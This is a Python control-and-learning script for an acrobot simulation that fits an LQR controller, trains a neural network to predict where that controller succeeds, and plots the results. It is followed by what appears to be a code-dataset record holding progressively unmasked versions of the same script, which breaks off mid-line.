"init_state_weights": [0, 0, 0, 0],
"max_t" : 2.5,
"dt": dt,
"m2": m2,
"m1": m1,
"l1": l1,
"lc1": lc1,
"lc2": lc2,
"i1": I1,
"i2": I2,
"integrator" : integrator,
"reward_fn": reward_fn,
"act_hold": 1
}
env = gym.make('su_acrobot-v0', **config)
num_trials = 200000
reward_hist = np.zeros((num_trials, env.num_steps, 1))
X = np.zeros((num_trials, 4), dtype=np.float32)
Y = np.zeros((num_trials, 1), dtype=np.float32)
th1_min = pi / 2 - .5
th1_max = pi / 2 + .5
th2_min = -1
th2_max = 1
th1dot_min = -5
th1dot_max = 5
th2dot_min = -10
th2dot_max = 10
samples = np.random.random_sample((int(num_trials/2), 4))
samples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min - th1dot_max, th2dot_min - th2dot_max])
samples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])
total_steps = 0
pool = Pool() # defaults to number of available CPU's
for i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(num_trials/2))))):
rews, steps = res
reward_hist[i, :, :] = rews
total_steps += steps
X[i, :] = samples[i, :]
Y[i] = sum(rews) > env.num_steps*3 - 10
th1_min = 0
th1_max = 2*pi
th2_min = -pi
th2_max = pi
th1dot_min = -10
th1dot_max = 10
th2dot_min = -30
th2dot_max = 30
samples = np.random.random_sample((int(num_trials/2), 4))
samples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min - th1dot_max, th2dot_min - th2dot_max])
samples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])
total_steps = 0
for i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(num_trials/2), int(num_trials))))):
rews, steps = res
reward_hist[i, :, :] = rews
total_steps += steps
X[i+int(num_trials/2), :] = samples[i, :]
Y[i+int(num_trials/2)] = sum(rews) > env.num_steps*3 - 5
print(time.time() - start)
# %%
from seagul.nn import MLP, fit_model
import torch
net = MLP(4, 1, 2, 32) # output_activation=torch.nn.Softmax)
Y0 = np.ones((num_trials, 1), dtype=np.float32)
w = 1e-2
class_weight = torch.tensor(Y.shape[0]/sum(Y)*w, dtype=torch.float32)
loss_hist = fit_model(net, X, Y, 50, batch_size=2048, loss_fn=torch.nn.BCEWithLogitsLoss(pos_weight=class_weight))
#loss_hist = fit_model(net, X, Y, 50, batch_size=2048, loss_fn=torch.nn.BCEWithLogitsLoss())
# loss_hist = fit_model(net, X, Y, 100, batch_size=2048)
# loss_hist = fit_model(net, X, Y0, 5, batch_size=2048, loss_fn=torch.nn.BCEWithLogitsLoss(pos_weight=class_weight))
plt.close()
plt.plot(loss_hist)
plt.show()
# %%
n_thdot = 1
n_th = 1000
th1_vals = np.linspace(0, 2*pi, n_th)
th2_vals = np.linspace(-pi, pi, n_th)
th1dot_vals = np.linspace(-10, 10, n_th)
th2dot_vals = np.linspace(-30, 30, n_th)
sig = torch.nn.Sigmoid()
coords = np.zeros((n_th, n_th, 4), dtype=np.float32)
from itertools import product
start = time.time()
for i, j in product(range(n_th), range(n_th)):
coords[j, i, :] = np.array([th1_vals[i], th2_vals[j], 0, 0])
preds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())
end = time.time()
print(end - start)
fig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))
# generate 2 2d grids for the x & y bounds
x, y = np.meshgrid(th1_vals, th2_vals)
z = preds
# x and y are bounds, so z should be the value *inside* those bounds.
# Therefore, remove the last value from the z array.
z = z[:-1, :-1]
z_min, z_max = 0, np.abs(z).max()
c = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)
ax.set_title('Theta')
ax.set_xlabel('Th1')
ax.set_ylabel('Th2')
# set the limits of the plot to the limits of the data
ax.axis([x.min(), x.max(), y.min(), y.max()])
fig.colorbar(c, ax=ax)
plt.show()
coords = np.zeros((n_th, n_th, 4), dtype=np.float32)
start = time.time()
for i, j in product(range(n_th), range(n_th)):
coords[j, i, :] = np.array([pi/2, 0, th1dot_vals[i], th2dot_vals[j]])
preds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())
end = time.time()
print(end - start)
fig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))
# generate 2 2d grids for the x & y bounds
x, y = np.meshgrid(th1dot_vals, th2dot_vals)
z = preds
# x and y are bounds, so z should be the value *inside* those bounds.
# Therefore, remove the last value from the z array.
z = z[:-1, :-1]
z_min, z_max = 0, np.abs(z).max()
c = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)
ax.set_title('DTheta')
ax.set_xlabel('dth1')
ax.set_ylabel('dth2')
# set the limits of the plot to the limits of the data
ax.axis([x.min(), x.max(), y.min(), y.max()])
fig.colorbar(c, ax=ax)
plt.show()
# %%
torch.set_default_dtype(torch.float32)
def reward_fn(s, a):
reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])
return reward, False
def do_rollout(trial_num):
np.random.seed(trial_num)
act_hold = 20
hold_count = 0
obs = env.reset()
local_lqr = False
actions = np.random.randn(1) * 3
local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0]))
local_reward_hist = np.zeros((env.num_steps, 1))
local_gate_hist = np.zeros((env.num_steps, 1))
local_action_hist = np.zeros((env.num_steps, 1))
for i in range(env.num_steps):
obs = np.array(obs, dtype=np.float32)
if sig(net(obs)) > .85:
actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)
local_lqr = True
local_gate_hist[i] = 1
else:
local_gate_hist[i] = 0
if hold_count == act_hold:
actions = np.random.randn(1) * 3
hold_count = 0
hold_count += 1
obs, reward, done, _ = env.step(actions)
local_action_hist[i, :] = np.copy(actions)
local_state_hist[i, :] = np.copy(obs)
local_reward_hist[i, :] = np.copy(reward)
return local_action_hist, local_state_hist, local_reward_hist, local_gate_hist, local_lqr
config = {"init_state": [-pi / 2, 0, 0, 0],
"max_torque": max_torque,
"init_state_weights": [1, 1, 5, 5],
"dt": dt,
"m2": m2,
"m1": m1,
"l1": l1,
"lc1": lc1,
"lc2": lc2,
"i1": I1,
"i2": I2,
"integrator" : integrator,
"reward_fn": reward_fn,
"act_hold": 1,
"max_t" : 10
}
env = gym.make('su_acrobot-v0', **config)
num_trials = 1000
action_hist = np.zeros((num_trials, env.num_steps, 1))
state_hist = np.zeros((num_trials, env.num_steps, env.observation_space.shape[0]))
reward_hist = np.zeros((num_trials, env.num_steps, 1))
gate_hist = np.zeros((num_trials, env.num_steps, 1))
err_hist = np.zeros((num_trials, 1))
lqr_list = []
success_list = []
act_hold = 20
hold_count = 0
obs = env.reset()
start = time.time()
pool = Pool() # defaults to number of available CPU's
for i, res in enumerate(pool.imap(do_rollout,range(num_trials))):
acts, obs, rews, gate, lqr_on = res
action_hist[i, :, :] = acts
state_hist[i, :, :] = obs
reward_hist[i, :, :] = rews
gate_hist[i, :, :] = gate
err_hist[i] = (np.sqrt(sum(((state_hist[i, -1, :] - np.array([pi / 2, 0, 0, 0])) ** 2))))
if lqr_on:
lqr_list.append(i)
#print(err_hist[i])
#print(reward_hist[i,-1])
if err_hist[i] < 2:
success_list.append(i)
#
# for i in (range(num_trials)):
# res = do_rollout(i)
# acts, obs, rews, gate, lqr_on = res
# action_hist[i, :, :] = acts
# state_hist[i, :, :] = obs
# reward_hist[i, :, :] = rews
# gate_hist[i, :, :] = gate
# err_hist[i] = (np.sqrt(sum(((state_hist[i, -1, :] - np.array([pi / 2, 0, 0, 0])) ** 2))))
# if lqr_on:
# lqr_list.append(i)
# #print(err_hist[i])
# #print(reward_hist[i,-1])
# if err_hist[i] < 2:
# success_list.append(i)
print(len(lqr_list))
print(len(success_list))
print((time.time() - global_start) / 60)
|
flexible
|
{
"blob_id": "358d4573ff386d6874d5bb5decfe71c71141bf1c",
"index": 2525,
"step-1": "<mask token>\n\n\ndef control(q):\n gs = np.array([pi / 2, 0, 0, 0])\n return -k.dot(q - gs)\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n done = reward < 2\n return reward, done\n\n\ndef do_rollout(args):\n x, trial_num = args\n th1, th2, dth1, dth2 = x\n np.random.seed(trial_num)\n local_reward_hist = np.ones((env.num_steps, 1)) * -1\n obs = env.reset(init_vec=[th1, th2, dth1, dth2])\n for i in range(env.num_steps):\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)\n obs, reward, done, _ = env.step(actions)\n local_reward_hist[i, :] = np.copy(reward)\n if done:\n break\n return local_reward_hist, i\n\n\n<mask token>\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n return reward, False\n\n\ndef do_rollout(trial_num):\n np.random.seed(trial_num)\n act_hold = 20\n hold_count = 0\n obs = env.reset()\n local_lqr = False\n actions = np.random.randn(1) * 3\n local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0])\n )\n local_reward_hist = np.zeros((env.num_steps, 1))\n local_gate_hist = np.zeros((env.num_steps, 1))\n local_action_hist = np.zeros((env.num_steps, 1))\n for i in range(env.num_steps):\n obs = np.array(obs, dtype=np.float32)\n if sig(net(obs)) > 0.85:\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque\n )\n local_lqr = True\n local_gate_hist[i] = 1\n else:\n local_gate_hist[i] = 0\n if hold_count == act_hold:\n actions = np.random.randn(1) * 3\n hold_count = 0\n hold_count += 1\n obs, reward, done, _ = env.step(actions)\n local_action_hist[i, :] = np.copy(actions)\n local_state_hist[i, :] = np.copy(obs)\n local_reward_hist[i, :] = np.copy(reward)\n return (local_action_hist, local_state_hist, local_reward_hist,\n local_gate_hist, local_lqr)\n\n\n<mask token>\n",
"step-2": "<mask token>\nassert np.linalg.matrix_rank(Ctr) == 4\n<mask token>\nprint(k)\n\n\ndef control(q):\n gs = np.array([pi / 2, 0, 0, 0])\n return -k.dot(q - gs)\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n done = reward < 2\n return reward, done\n\n\ndef do_rollout(args):\n x, trial_num = args\n th1, th2, dth1, dth2 = x\n np.random.seed(trial_num)\n local_reward_hist = np.ones((env.num_steps, 1)) * -1\n obs = env.reset(init_vec=[th1, th2, dth1, dth2])\n for i in range(env.num_steps):\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)\n obs, reward, done, _ = env.step(actions)\n local_reward_hist[i, :] = np.copy(reward)\n if done:\n break\n return local_reward_hist, i\n\n\n<mask token>\nsamples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -\n th1dot_max, th2dot_min - th2dot_max])\nsamples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])\n<mask token>\nfor i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(\n num_trials / 2))))):\n rews, steps = res\n reward_hist[i, :, :] = rews\n total_steps += steps\n X[i, :] = samples[i, :]\n Y[i] = sum(rews) > env.num_steps * 3 - 10\n<mask token>\nsamples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -\n th1dot_max, th2dot_min - th2dot_max])\nsamples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])\n<mask token>\nfor i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(\n num_trials / 2), int(num_trials))))):\n rews, steps = res\n reward_hist[i, :, :] = rews\n total_steps += steps\n X[i + int(num_trials / 2), :] = samples[i, :]\n Y[i + int(num_trials / 2)] = sum(rews) > env.num_steps * 3 - 5\nprint(time.time() - start)\n<mask token>\nplt.close()\nplt.plot(loss_hist)\nplt.show()\n<mask token>\nfor i, j in product(range(n_th), range(n_th)):\n coords[j, i, :] = np.array([th1_vals[i], th2_vals[j], 0, 0])\n<mask token>\nprint(end - start)\n<mask token>\nax.set_title('Theta')\nax.set_xlabel('Th1')\nax.set_ylabel('Th2')\nax.axis([x.min(), x.max(), y.min(), y.max()])\nfig.colorbar(c, ax=ax)\nplt.show()\n<mask token>\nfor i, j in product(range(n_th), range(n_th)):\n coords[j, i, :] = np.array([pi / 2, 0, th1dot_vals[i], th2dot_vals[j]])\n<mask token>\nprint(end - start)\n<mask token>\nax.set_title('DTheta')\nax.set_xlabel('dth1')\nax.set_ylabel('dth2')\nax.axis([x.min(), x.max(), y.min(), y.max()])\nfig.colorbar(c, ax=ax)\nplt.show()\ntorch.set_default_dtype(torch.float32)\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n return reward, False\n\n\ndef do_rollout(trial_num):\n np.random.seed(trial_num)\n act_hold = 20\n hold_count = 0\n obs = env.reset()\n local_lqr = False\n actions = np.random.randn(1) * 3\n local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0])\n )\n local_reward_hist = np.zeros((env.num_steps, 1))\n local_gate_hist = np.zeros((env.num_steps, 1))\n local_action_hist = np.zeros((env.num_steps, 1))\n for i in range(env.num_steps):\n obs = np.array(obs, dtype=np.float32)\n if sig(net(obs)) > 0.85:\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque\n )\n local_lqr = True\n local_gate_hist[i] = 1\n else:\n local_gate_hist[i] = 0\n if hold_count == act_hold:\n actions = np.random.randn(1) * 3\n hold_count = 0\n hold_count += 1\n obs, reward, done, _ = env.step(actions)\n local_action_hist[i, :] = np.copy(actions)\n local_state_hist[i, :] = np.copy(obs)\n local_reward_hist[i, :] = np.copy(reward)\n return (local_action_hist, local_state_hist, local_reward_hist,\n local_gate_hist, local_lqr)\n\n\n<mask token>\nfor i, res in enumerate(pool.imap(do_rollout, range(num_trials))):\n acts, obs, rews, gate, lqr_on = res\n action_hist[i, :, :] = acts\n state_hist[i, :, :] = obs\n reward_hist[i, :, :] = rews\n gate_hist[i, :, :] = gate\n err_hist[i] = np.sqrt(sum((state_hist[i, -1, :] - np.array([pi / 2, 0, \n 0, 0])) ** 2))\n if lqr_on:\n lqr_list.append(i)\n if err_hist[i] < 2:\n success_list.append(i)\nprint(len(lqr_list))\nprint(len(success_list))\nprint((time.time() - global_start) / 60)\n",
"step-3": "<mask token>\nglobal_start = time.time()\nm1 = 1\nm2 = 1\nl1 = 1\nl2 = 2\nlc1 = 0.5\nlc2 = 1\nI1 = 0.083\nI2 = 0.33\ng = 9.8\ndt = 0.01\nmax_torque = 25\nintegrator = euler\nQ = np.identity(4)\nQ[0, 0] = 1\nQ[1, 1] = 1\nQ[2, 2] = 1\nQ[3, 3] = 1\nR = np.identity(2) * 0.01\neval_max_t = 10\nth1 = pi / 2\nth2 = 0\nth1d = 0\nth2d = 0\nTAU = np.array([[0], [1]])\nm11 = m1 * lc1 ** 2 + m2 * (l1 ** 2 + lc2 ** 2 + 2 * l1 * lc2 * cos(th2)\n ) + I1 + I2\nm22 = m2 * lc2 ** 2 + I2\nm12 = m2 * (lc2 ** 2 + l1 * lc2 * cos(th2)) + I2\nM = np.array([[m11, m12], [m12, m22]])\nh1 = -m2 * l1 * lc2 * sin(th2) * th2d ** 2 - 2 * m2 * l1 * lc2 * sin(th2\n ) * th2d * th1d\nh2 = m2 * l1 * lc2 * sin(th2) * th1d ** 2\nH = np.array([[h1], [h2]])\nphi1 = (m1 * lc1 + m2 * l1) * g * cos(th1) + m2 * lc2 * g * cos(th1 + th2)\nphi2 = m2 * lc2 * g * cos(th1 + th2)\nPHI = np.array([[phi1], [phi2]])\nBl = np.linalg.inv(M) @ TAU\nBlin = np.array([[0, 0], [0, 0], [0, Bl[0].item()], [0, Bl[1].item()]])\nDPHI = np.array([[-g * (m1 * lc1 + m2 * l1 + m2 * lc2), -m2 * lc2 * g], [-\n m2 * lc2 * g, -m2 * lc2 * g]])\nAl = -np.linalg.inv(M) @ DPHI\nAlin = np.array([[0, 0, 1, 0], [0, 0, 0, 1], [Al[0, 0], Al[0, 1], 0, 0], [\n Al[1, 0], Al[1, 1], 0, 0]])\nCtr = ctrb(Alin, Blin)\nassert np.linalg.matrix_rank(Ctr) == 4\nK, S, E = lqr(Alin, Blin, Q, R)\nk = np.array(K[1, :])\nprint(k)\n\n\ndef control(q):\n gs = np.array([pi / 2, 0, 0, 0])\n return -k.dot(q - gs)\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n done = reward < 2\n return reward, done\n\n\ndef do_rollout(args):\n x, trial_num = args\n th1, th2, dth1, dth2 = x\n np.random.seed(trial_num)\n local_reward_hist = np.ones((env.num_steps, 1)) * -1\n obs = env.reset(init_vec=[th1, th2, dth1, dth2])\n for i in range(env.num_steps):\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)\n obs, reward, done, _ = env.step(actions)\n local_reward_hist[i, :] = np.copy(reward)\n if done:\n break\n return local_reward_hist, i\n\n\nstart = time.time()\nconfig = {'init_state': [0, 0, 0, 0], 'max_torque': max_torque,\n 'init_state_weights': [0, 0, 0, 0], 'max_t': 2.5, 'dt': dt, 'm2': m2,\n 'm1': m1, 'l1': l1, 'lc1': lc1, 'lc2': lc2, 'i1': I1, 'i2': I2,\n 'integrator': integrator, 'reward_fn': reward_fn, 'act_hold': 1}\nenv = gym.make('su_acrobot-v0', **config)\nnum_trials = 200000\nreward_hist = np.zeros((num_trials, env.num_steps, 1))\nX = np.zeros((num_trials, 4), dtype=np.float32)\nY = np.zeros((num_trials, 1), dtype=np.float32)\nth1_min = pi / 2 - 0.5\nth1_max = pi / 2 + 0.5\nth2_min = -1\nth2_max = 1\nth1dot_min = -5\nth1dot_max = 5\nth2dot_min = -10\nth2dot_max = 10\nsamples = np.random.random_sample((int(num_trials / 2), 4))\nsamples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -\n th1dot_max, th2dot_min - th2dot_max])\nsamples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])\ntotal_steps = 0\npool = Pool()\nfor i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(\n num_trials / 2))))):\n rews, steps = res\n reward_hist[i, :, :] = rews\n total_steps += steps\n X[i, :] = samples[i, :]\n Y[i] = sum(rews) > env.num_steps * 3 - 10\nth1_min = 0\nth1_max = 2 * pi\nth2_min = -pi\nth2_max = pi\nth1dot_min = -10\nth1dot_max = 10\nth2dot_min = -30\nth2dot_max = 30\nsamples = np.random.random_sample((int(num_trials / 2), 4))\nsamples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -\n th1dot_max, th2dot_min - th2dot_max])\nsamples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])\ntotal_steps = 0\nfor i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(\n num_trials / 2), int(num_trials))))):\n rews, steps = res\n reward_hist[i, :, :] = rews\n total_steps += steps\n X[i + int(num_trials / 2), :] = samples[i, :]\n Y[i + int(num_trials / 2)] = sum(rews) > env.num_steps * 3 - 5\nprint(time.time() - start)\n<mask token>\nnet = MLP(4, 1, 2, 32)\nY0 = np.ones((num_trials, 1), dtype=np.float32)\nw = 0.01\nclass_weight = torch.tensor(Y.shape[0] / sum(Y) * w, dtype=torch.float32)\nloss_hist = fit_model(net, X, Y, 50, batch_size=2048, loss_fn=torch.nn.\n BCEWithLogitsLoss(pos_weight=class_weight))\nplt.close()\nplt.plot(loss_hist)\nplt.show()\nn_thdot = 1\nn_th = 1000\nth1_vals = np.linspace(0, 2 * pi, n_th)\nth2_vals = np.linspace(-pi, pi, n_th)\nth1dot_vals = np.linspace(-10, 10, n_th)\nth2dot_vals = np.linspace(-30, 30, n_th)\nsig = torch.nn.Sigmoid()\ncoords = np.zeros((n_th, n_th, 4), dtype=np.float32)\n<mask token>\nstart = time.time()\nfor i, j in product(range(n_th), range(n_th)):\n coords[j, i, :] = np.array([th1_vals[i], th2_vals[j], 0, 0])\npreds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())\nend = time.time()\nprint(end - start)\nfig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))\nx, y = np.meshgrid(th1_vals, th2_vals)\nz = preds\nz = z[:-1, :-1]\nz_min, z_max = 0, np.abs(z).max()\nc = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)\nax.set_title('Theta')\nax.set_xlabel('Th1')\nax.set_ylabel('Th2')\nax.axis([x.min(), x.max(), y.min(), y.max()])\nfig.colorbar(c, ax=ax)\nplt.show()\ncoords = np.zeros((n_th, n_th, 4), dtype=np.float32)\nstart = time.time()\nfor i, j in product(range(n_th), range(n_th)):\n coords[j, i, :] = np.array([pi / 2, 0, th1dot_vals[i], th2dot_vals[j]])\npreds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())\nend = time.time()\nprint(end - start)\nfig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))\nx, y = np.meshgrid(th1dot_vals, th2dot_vals)\nz = preds\nz = z[:-1, :-1]\nz_min, z_max = 0, np.abs(z).max()\nc = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)\nax.set_title('DTheta')\nax.set_xlabel('dth1')\nax.set_ylabel('dth2')\nax.axis([x.min(), x.max(), y.min(), y.max()])\nfig.colorbar(c, ax=ax)\nplt.show()\ntorch.set_default_dtype(torch.float32)\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n return reward, False\n\n\ndef do_rollout(trial_num):\n np.random.seed(trial_num)\n act_hold = 20\n hold_count = 0\n obs = env.reset()\n local_lqr = False\n actions = np.random.randn(1) * 3\n local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0])\n )\n local_reward_hist = np.zeros((env.num_steps, 1))\n local_gate_hist = np.zeros((env.num_steps, 1))\n local_action_hist = np.zeros((env.num_steps, 1))\n for i in range(env.num_steps):\n obs = np.array(obs, dtype=np.float32)\n if sig(net(obs)) > 0.85:\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque\n )\n local_lqr = True\n local_gate_hist[i] = 1\n else:\n local_gate_hist[i] = 0\n if hold_count == act_hold:\n actions = np.random.randn(1) * 3\n hold_count = 0\n hold_count += 1\n obs, reward, done, _ = env.step(actions)\n local_action_hist[i, :] = np.copy(actions)\n local_state_hist[i, :] = np.copy(obs)\n local_reward_hist[i, :] = np.copy(reward)\n return (local_action_hist, local_state_hist, local_reward_hist,\n local_gate_hist, local_lqr)\n\n\nconfig = {'init_state': [-pi / 2, 0, 0, 0], 'max_torque': max_torque,\n 'init_state_weights': [1, 1, 5, 5], 'dt': dt, 'm2': m2, 'm1': m1, 'l1':\n l1, 'lc1': lc1, 'lc2': lc2, 'i1': I1, 'i2': I2, 'integrator':\n integrator, 'reward_fn': reward_fn, 'act_hold': 1, 'max_t': 10}\nenv = gym.make('su_acrobot-v0', **config)\nnum_trials = 1000\naction_hist = np.zeros((num_trials, env.num_steps, 1))\nstate_hist = np.zeros((num_trials, env.num_steps, env.observation_space.\n shape[0]))\nreward_hist = np.zeros((num_trials, env.num_steps, 1))\ngate_hist = np.zeros((num_trials, env.num_steps, 1))\nerr_hist = np.zeros((num_trials, 1))\nlqr_list = []\nsuccess_list = []\nact_hold = 20\nhold_count = 0\nobs = env.reset()\nstart = time.time()\npool = Pool()\nfor i, res in enumerate(pool.imap(do_rollout, range(num_trials))):\n acts, obs, rews, gate, lqr_on = res\n action_hist[i, :, :] = acts\n state_hist[i, :, :] = obs\n reward_hist[i, :, :] = rews\n gate_hist[i, :, :] = gate\n err_hist[i] = np.sqrt(sum((state_hist[i, -1, :] - np.array([pi / 2, 0, \n 0, 0])) ** 2))\n if lqr_on:\n lqr_list.append(i)\n if err_hist[i] < 2:\n success_list.append(i)\nprint(len(lqr_list))\nprint(len(success_list))\nprint((time.time() - global_start) / 60)\n",
"step-4": "import numpy as np\nfrom numpy import sin, cos, pi\nimport gym\nimport seagul.envs\nfrom seagul.integration import rk4, euler\nfrom control import lqr, ctrb\nfrom torch.multiprocessing import Pool\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport time\nglobal_start = time.time()\nm1 = 1\nm2 = 1\nl1 = 1\nl2 = 2\nlc1 = 0.5\nlc2 = 1\nI1 = 0.083\nI2 = 0.33\ng = 9.8\ndt = 0.01\nmax_torque = 25\nintegrator = euler\nQ = np.identity(4)\nQ[0, 0] = 1\nQ[1, 1] = 1\nQ[2, 2] = 1\nQ[3, 3] = 1\nR = np.identity(2) * 0.01\neval_max_t = 10\nth1 = pi / 2\nth2 = 0\nth1d = 0\nth2d = 0\nTAU = np.array([[0], [1]])\nm11 = m1 * lc1 ** 2 + m2 * (l1 ** 2 + lc2 ** 2 + 2 * l1 * lc2 * cos(th2)\n ) + I1 + I2\nm22 = m2 * lc2 ** 2 + I2\nm12 = m2 * (lc2 ** 2 + l1 * lc2 * cos(th2)) + I2\nM = np.array([[m11, m12], [m12, m22]])\nh1 = -m2 * l1 * lc2 * sin(th2) * th2d ** 2 - 2 * m2 * l1 * lc2 * sin(th2\n ) * th2d * th1d\nh2 = m2 * l1 * lc2 * sin(th2) * th1d ** 2\nH = np.array([[h1], [h2]])\nphi1 = (m1 * lc1 + m2 * l1) * g * cos(th1) + m2 * lc2 * g * cos(th1 + th2)\nphi2 = m2 * lc2 * g * cos(th1 + th2)\nPHI = np.array([[phi1], [phi2]])\nBl = np.linalg.inv(M) @ TAU\nBlin = np.array([[0, 0], [0, 0], [0, Bl[0].item()], [0, Bl[1].item()]])\nDPHI = np.array([[-g * (m1 * lc1 + m2 * l1 + m2 * lc2), -m2 * lc2 * g], [-\n m2 * lc2 * g, -m2 * lc2 * g]])\nAl = -np.linalg.inv(M) @ DPHI\nAlin = np.array([[0, 0, 1, 0], [0, 0, 0, 1], [Al[0, 0], Al[0, 1], 0, 0], [\n Al[1, 0], Al[1, 1], 0, 0]])\nCtr = ctrb(Alin, Blin)\nassert np.linalg.matrix_rank(Ctr) == 4\nK, S, E = lqr(Alin, Blin, Q, R)\nk = np.array(K[1, :])\nprint(k)\n\n\ndef control(q):\n gs = np.array([pi / 2, 0, 0, 0])\n return -k.dot(q - gs)\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n done = reward < 2\n return reward, done\n\n\ndef do_rollout(args):\n x, trial_num = args\n th1, th2, dth1, dth2 = x\n np.random.seed(trial_num)\n local_reward_hist = np.ones((env.num_steps, 1)) * -1\n obs = env.reset(init_vec=[th1, th2, dth1, dth2])\n for i in range(env.num_steps):\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)\n obs, reward, done, _ = env.step(actions)\n local_reward_hist[i, :] = np.copy(reward)\n if done:\n break\n return local_reward_hist, i\n\n\nstart = time.time()\nconfig = {'init_state': [0, 0, 0, 0], 'max_torque': max_torque,\n 'init_state_weights': [0, 0, 0, 0], 'max_t': 2.5, 'dt': dt, 'm2': m2,\n 'm1': m1, 'l1': l1, 'lc1': lc1, 'lc2': lc2, 'i1': I1, 'i2': I2,\n 'integrator': integrator, 'reward_fn': reward_fn, 'act_hold': 1}\nenv = gym.make('su_acrobot-v0', **config)\nnum_trials = 200000\nreward_hist = np.zeros((num_trials, env.num_steps, 1))\nX = np.zeros((num_trials, 4), dtype=np.float32)\nY = np.zeros((num_trials, 1), dtype=np.float32)\nth1_min = pi / 2 - 0.5\nth1_max = pi / 2 + 0.5\nth2_min = -1\nth2_max = 1\nth1dot_min = -5\nth1dot_max = 5\nth2dot_min = -10\nth2dot_max = 10\nsamples = np.random.random_sample((int(num_trials / 2), 4))\nsamples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -\n th1dot_max, th2dot_min - th2dot_max])\nsamples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])\ntotal_steps = 0\npool = Pool()\nfor i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(\n num_trials / 2))))):\n rews, steps = res\n reward_hist[i, :, :] = rews\n total_steps += steps\n X[i, :] = samples[i, :]\n Y[i] = sum(rews) > env.num_steps * 3 - 10\nth1_min = 0\nth1_max = 2 * pi\nth2_min = -pi\nth2_max = pi\nth1dot_min = -10\nth1dot_max = 10\nth2dot_min = -30\nth2dot_max = 30\nsamples = np.random.random_sample((int(num_trials / 2), 4))\nsamples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -\n th1dot_max, th2dot_min - th2dot_max])\nsamples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])\ntotal_steps = 0\nfor i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(\n num_trials / 2), int(num_trials))))):\n rews, steps = res\n reward_hist[i, :, :] = rews\n total_steps += steps\n X[i + int(num_trials / 2), :] = samples[i, :]\n Y[i + int(num_trials / 2)] = sum(rews) > env.num_steps * 3 - 5\nprint(time.time() - start)\nfrom seagul.nn import MLP, fit_model\nimport torch\nnet = MLP(4, 1, 2, 32)\nY0 = np.ones((num_trials, 1), dtype=np.float32)\nw = 0.01\nclass_weight = torch.tensor(Y.shape[0] / sum(Y) * w, dtype=torch.float32)\nloss_hist = fit_model(net, X, Y, 50, batch_size=2048, loss_fn=torch.nn.\n BCEWithLogitsLoss(pos_weight=class_weight))\nplt.close()\nplt.plot(loss_hist)\nplt.show()\nn_thdot = 1\nn_th = 1000\nth1_vals = np.linspace(0, 2 * pi, n_th)\nth2_vals = np.linspace(-pi, pi, n_th)\nth1dot_vals = np.linspace(-10, 10, n_th)\nth2dot_vals = np.linspace(-30, 30, n_th)\nsig = torch.nn.Sigmoid()\ncoords = np.zeros((n_th, n_th, 4), dtype=np.float32)\nfrom itertools import product\nstart = time.time()\nfor i, j in product(range(n_th), range(n_th)):\n coords[j, i, :] = np.array([th1_vals[i], th2_vals[j], 0, 0])\npreds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())\nend = time.time()\nprint(end - start)\nfig, ax = 